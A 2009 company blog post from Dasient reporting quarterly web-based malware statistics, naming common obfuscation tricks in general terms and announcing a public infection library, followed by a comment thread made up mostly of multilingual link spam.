Tuesday, October 27, 2009

New Q3'09 malware data, and the Dasient Infection Library

Ed. Note: The data in this post is drawn primarily from Dasient's proprietary malware analysis platform, which gathers data on web-based malware attacks from across the web and in the last six months has been used to help tens of thousands of site owners address their web-based malware issues. This is the first in a series of regular reports on these trends.

As we've discussed in this space before, we are seeing a fundamental shift in how malware is being distributed: Attackers are focusing more than ever on compromising legitimate websites and using them to distribute malware. As a result, more and more sites are feeling the effects of web-based malware infection, which can include loss of traffic, decline in revenue, and damage to brand equity.

This trend is underlined by the data we've gathered on the third quarter of 2009, which saw significant activity on the web-based malware front. During that span, Dasient identified more than 52,000 web-based malware infections, making for a total of more than 72,000 unique malware infections identified and catalogued since our malware analysis platform launched.

Based on the telemetry data we've gathered from the web, we estimate that more than 640,000 sites and approximately 5.8 million pages were infected in the quarter. This is a substantial increase from data published by Microsoft in April 2009, which pegged the number of infected pages per quarter at a little more than 3 million. This increased activity is also reflected in the rapid growth of the blacklists maintained by search engines, browsers, and anti-virus software companies. The Google blacklist alone has more than doubled in the last year, and at certain points has been adding 40,000 new sites per week.

This shift has been accelerated by the fact that using legitimate sites as a delivery method enables attackers to infect large numbers of endpoints at once, and by the trend toward increasing complexity in and interoperability between websites and web applications (which is in turn opening up more and more attack surfaces).

Substantial portions of sites being infected

While it often takes only a couple of infected pages to harm users or land a site on one of the many blacklists, our research suggests that when sites are infected, the bad code is installed on a significant portion of the pages on those sites. In Q3'09, the infections on newly compromised sites of 10 pages or more spread to an average of 19% of those sites' pages.

This number is significant for a couple of reasons. For one, the greater the percentage of a site that's infected, the greater the chances are that the site will spread malware to users or be flagged by a blacklist provider. For another, modern web-based malware infections are frequently complex and heavily obfuscated, making it a challenge even for experienced webmasters to identify all the bad code on the site and remove it. The more infected pages there are on the site, the longer it can take to address the infection. And if the site has already been blacklisted (which is often the case), then the site will take a hit in traffic, reputation, and revenue with each day that passes during the cleanup and blacklist appeal process.

High reinfection rate

Another trend worth noting from Q3 is the high reinfection rate for sites, which came in at 39.6%. There are a number of factors that could contribute to a high reinfection rate, including the tendency for attackers to look for attack vectors common to large numbers of sites and then develop automated attack scripts that will repeatedly seek out those vectors and exploit them.

The sheer number of available attack vectors likely also plays a part. Common attack vectors include compromised FTP credentials, server-side vulnerabilities, unpatched or unknown web application vulnerabilities, and syndicated ad networks serving malicious ads. With attackers embracing scale and automation, and with so many ways for even well-secured sites to be compromised, it's becoming more and more important for site owners to employ tools that can help them regularly monitor their sites for infection and quickly address any issues that arise.

New attack techniques

As you can see in the graph below, the vast majority of the web-based malware attacks in Q3 could be classified as JavaScript (54.8%) and iFrame (37.1%) attacks, with "other" attacks accounting for only 8.1%.

One of the challenging things about trying to protect sites from the threat of web-based malware is that the attacks often evolve very quickly and make use of a number of obfuscation techniques to evade traditional malware scanners. We saw plenty of this activity in Q3, with some notable recent examples being dynamically generating the SRC attribute in iFrames to foil scanners that look at SRC attributes; using partially or fully encoded URLs to frustrate scanners that look for regular expressions; and adding phrases like "analytics-google" to malicious code to fool webmasters into thinking the code is legitimate.

Dasient to open up web-based malware Infection Library

The Dasient Web-Anti Malware (WAM) service regularly monitors our customers' sites for signs of a web-based malware infection. When an infection is detected, it notifies the customer immediately, providing full diagnostic information on the infection. It can also automatically strip out the bad code from infected pages before they're served to the site's users -- keeping those users safe and keeping the site off the blacklist. We're proud to be able to provide this service to our customers, and have received great feedback since launching earlier this year.

But as the threat of web-based malware continues to grow, one of the things we're hearing from the web, security, and IT professionals we work with is that they need more information to help them keep track of the threat and ensure that they have the tools they need to address it. With that in mind, we will now start providing these professionals with a view into the Dasient Infection Library, which in just a few months has accumulated data on more than 70,000 different web-based malware infections.


To start, we'll be providing information on the top 10 web-based malware attacks for the week, as well as some other basic trend information on the latest attacks. We'll also be publishing relatively new infections that our platform finds to a dedicated Twitter feed. We hope to expand the view we offer into our Infection Library in the future, and are looking forward to your feedback on the kinds of data and functionality you'd find useful.

If you're a business owner and you'd like to learn more about how Dasient WAM can help protect your business, head here. If you're a web hosting provider and you'd like to learn about partnership opportunities with Dasient, check out this page. And no matter who you are, please be sure to check out our Twitter feed at http://twitter.com/dasient for all the latest in web-based malware and general security news.


40 comments:

  1. The infection library would make a very useful Firefox plugin, wouldn't it?

    I know a ton of people that would use it profusely, and I bet it would drive a lot of traffic to your website.

    Excellent report, by the way. Thanks!

    Ruy

    ReplyDelete
  2. hello friends I really liked this information, a few days ago I read something similar, I would like to receive updates on this issue, as it is very interesting, thanks!

    ReplyDelete
    Replies
    1. Trang tri noi that xu thế này khát khao với quan niệm sống giuong ngu go tu nhien , tu quan ao phong ngu , den trang tri phong ngu tươi mới tràn đầy sức sống thường thấy trong các chung cư tại thành phố to. số đông phân bố chú trong công năng tu bep go tu nhiennhà chung cư sao cho cách tân, thoáng đãng nhất đăc biệt phải có ánh sáng và không khí tự nhiên từ quang cảnh bên cạnh.noi that nha bep Về căn bản nét giản dị phảng phất thêm chút khả năng cách điệu tích hợp với chất liệu phổ biến không xem trọng hoa văn mà bận tâm vào không gian, bố cụ, cách sắp xếp thiết bị. tu go phong khach , ke tivi , den trang tri Bằng cách này chung cư trở thành tươi sáng, thanh lich, trang nhã. Nét đẹt bắt nguồn từ châu âu, những tòa lâu đài cổ xưa hay cung điện vua chúa ngày xưa. Nghe đến đây gia chủ tận hưởng được thời gian và công sức ban lam viec , ghe van phong , tu van phong nhà thiết kế và các người thợ thi công vật dụng trong nhà đông đảo do có những tiểu tiết, họa tiết phức tạp. Không chỉ thế các hiệu ứng ánh sáng phải đồng bộ mới thể hiện hết vẻ đẹp vốn có. Để ý kỹ chủ căn nhà noi that phong khach , noi that van phong 2016 , trang tri noi that phong ngu sẽ đón nhận số đông đồ vật dụng trong nhà thảm trải, đèn chùm, bàn ghế, tranh mỹ thuật sẽ tạo điểm nhấn cho Sofa phong khach sang trong tinh te , sofa giuong , ghe sofa doi , ban sofa phong khach ,toàn bộ ngôi nhà.nha dep 2016 , thiet ke noi that

      Delete
  3. Thanks for this wonderful post. I'm a health conscious guy and your article will be one of my new resource from now on.
    P.S I also have a blog about yeast infection and yeast infection remedies. If you want to learn more about the illness feel free to visit my site.

    ReplyDelete
  4. Its really wonderful and watchable. I like to share it with all my friends and hope they will like it
    my Blogs: cityville cheats | how to get taller

    ReplyDelete
  5. I like this info and well discuss.

    http://www.knowifagirllikesyou.com| http://www.makeagirlfallinlove.org/

    ReplyDelete
  6. There is lot of information and they are very innovative and informative. I have read the article very well and it seems to me awesome.
    agen bola, agen sbobet, agen ibcbet, agen bola, sbobet, agen bola

    ReplyDelete
  7. This is a great inspiring. I am pretty much pleased with your good work. You put really very helpful information. Looking to reading your next post.
    pasar taruhan bola , agen ibcbet , wap sbobet

    ReplyDelete
  8. Thank you, I have recently been searching for information about this topic for a while and yours is the best I've found out so far. body slim herbal original
    harga body slim herbal asli
    jual body slim herbal asli dan murah

    ReplyDelete
  9. There is definately a lot to know about this subject. I like all of the points you've made.cyber-bola.us

    ReplyDelete
  10. Những ngày cận tết nhu cầu mua sắm các thiết bị thiet ke noi that để chuẩn bị cho ngôi nhà của người dân VN càng được chú ý hơn. Vì vậy các công thy chuyên về lĩnh vực cua hang trang tri noi that cũng chuẩn bị chho mình khá kỹ càng hầu như các bộ phận thi cong noi that cong trinh hoat dong 24/24 cho ra những sản phẩm phục vụ cho những công trình mà chủ yếu hướng đền các dịch vụ như: thiet ke noi that chung cu dep - hay thiet ke noi that can ho xinh dep được gọi tên theo kiểu ở khu vực miền Bắc. Còn những công trình nhà dân dụng thì không thể không nói đến thiet ke noi that biet thu sang trong hay thiet ke noi that nha ong dep ngoài ra còn những sản phẩm về bàn ghế thiet ke noi that van phong chuyen nghiep - thiet ke spa cũng được ưu tiên sản xuất để phục vụ nhu cầu thi công cận Tết mang đến những kiểu mau nha dep 2016 sang trọng và hiện đại.

    ReplyDelete
  11. Prediksi Pasaran Bola Jitu Akurat
    agen bola
    agen judi
    agen poker online
    poker indonesia


    [url=http://infointerbola.com/]Prediksi Pasaran Bola Jitu Akurat[/url]
    [url=http://interbola.net]agen bola[/url]
    [url=http://interbola.net]agen judi[/url]
    [url=http://poker8m.com/]agen poker online[/url]
    [url=http://poker8m.com/]poker indonesia[/url]


    http://infointerbola.com
    Prediksi Pasaran Bola Jitu Akurat

    http://interbola.net
    agen bola

    http://interbola.net
    agen judi

    http://poker8m.com
    agen poker online

    http://poker8m.com
    poker indonesia

    ReplyDelete
  12. Replies


    1. شركة دهانات بالرياض

      كشف تسربات بالرياض

      شركة كشف تسربات بالدمام

      شركة كشف تسربات بجدة

      شركة كشف تسربات بالمدينة المنورة

      شركة كشف تسربات بالقصيم

      شركة تسليك مجارى بابها وخميس مشيط

      رش مبيدات بابها

      رش مبيدات بالدمام

      شركة تسليك مجارى بالدمام

      شركة كشف تسربات بالدمام

      شركة مكافحة حشرات بالمدينة المنورة

      شركة تسليك مجارى بالمدينة المنورة

      شركة نقل اثاث بالمدينة المنورة


      شركة كشف تسربات فارس


      رش مبيدات فارس


      اكبر شركة مقاولات بمنطقة عسير

      تنظيف منازل بالطائف

      شركة مكافحة حشرات بالمدينة المنورة

      شركة تسليك مجارى بالمدينة المنورة

      شركة نقل اثاث بالمدينة المنورة

      شركة كشف تسربات بالمدينة المنورة

      شركة تسليك مجارى بجدة

      شركة مكافحة حشرات بجدة

      شركة نظافة عامة بجدة

      شركة نقل اثاث بجدة

      شركة كشف تسربات بجدة

      شركة تسليك مجارى بالدمام

      شركة تنظيف مسابح بالدمام

      شركة تنظيف موكيت بالدمام

      شركة مكافحة حشرات بالدمام

      شركة كشف تسربات بالدمام

      شركة نظافة عامة بالدمام

      شركة نقل اثاث بالدمام

      Delete
  13. những loại thuốc tây chữa bệnh viêm gan b cần biết , mổ trong bệnh viêm amidan cấp , khắc phụ tình trạng viêm amidan hốc mủ cực nhanh thuốc chữa bệnh đại tràng của người thái. khi bị đau dạ dày cần biết bị đau dạ dày cần ăn gì cho thật tốt triệu chứng đau dạ dày như thế nào cách chữa viêm họng bằng nước muối bệnh viêm amidan ở trẻ em Hoặc sau khi mổ amidan cần kiêng gì sau cắt viêm amidan .

    Bài viết mới nhất triệu chứng viêm xoang kết hợp với những
    , thuốc dân gian chữa dạ dày hiệu quả tốt nhất mà tôi từng biết đến trẻ em bị bệnh mề đay có nguy hiểm không .

    ReplyDelete
  14. Bài này viết về cách chữa bệnh dạ dày hiệu quả tốt nhất , đâu là cách chữa bệnh viêm loét dạ dày tá tràng bằng đông y , bệnh amidan mãn tính có khó chữa không , thuốc chữa viêm amidan hốc mủ bằng dân gian hay đông y bệnh mề đay mãn tính ở vùng quê , Cách chữa gan nhiễm mỡ , thuốc chữa viêm phế quản mãn tính Nào cùng các nhà thuốc chữa bệnh ho và chữa bệnh viêm mui thời tiết bệnh xoang mũi chảy nước mũi thuốc chữa bệnh dạ dày bằng đông nam y thuốc chữa trào ngược dạ dày thực quản bệnh trào ngược thực quản rất khó chịu ,dầu gội nào chữa bệnh rụng tóc tốt nhất chữa rối loạn kinh nguyệt bằng đông y có tốt không chữa thoái hóa đốt sống cổ và cách mẹo giảm đau bệnh dạ dày sao cho đỡ đau

    ReplyDelete
  15. ارجو من ملك المدونة مساعدتى فى اشهار موقعى وشكرا
    شركة وادى الرياض تعتبر من افضل شركات تسليك المجارى بالدمام
    افضل شركة تسليك مجارى بالدمام
    تسليك مجارى بالدمام
    شركات تسليك مجارى بالدمام
    شركة تسليك مجارى بالدمام
    وادى الرياض تعتبر من اهم مؤسسات مكافحة الحشرات وسط شركات مكافحة الحشرات بالدمام
    افضل شركة مكافحة حشرات بالدمام
    شركات مكافحة حشرات بالدمام
    مكافحة حشرات بالدمام
    شركة مكافحة حشرات الدمام

    ReplyDelete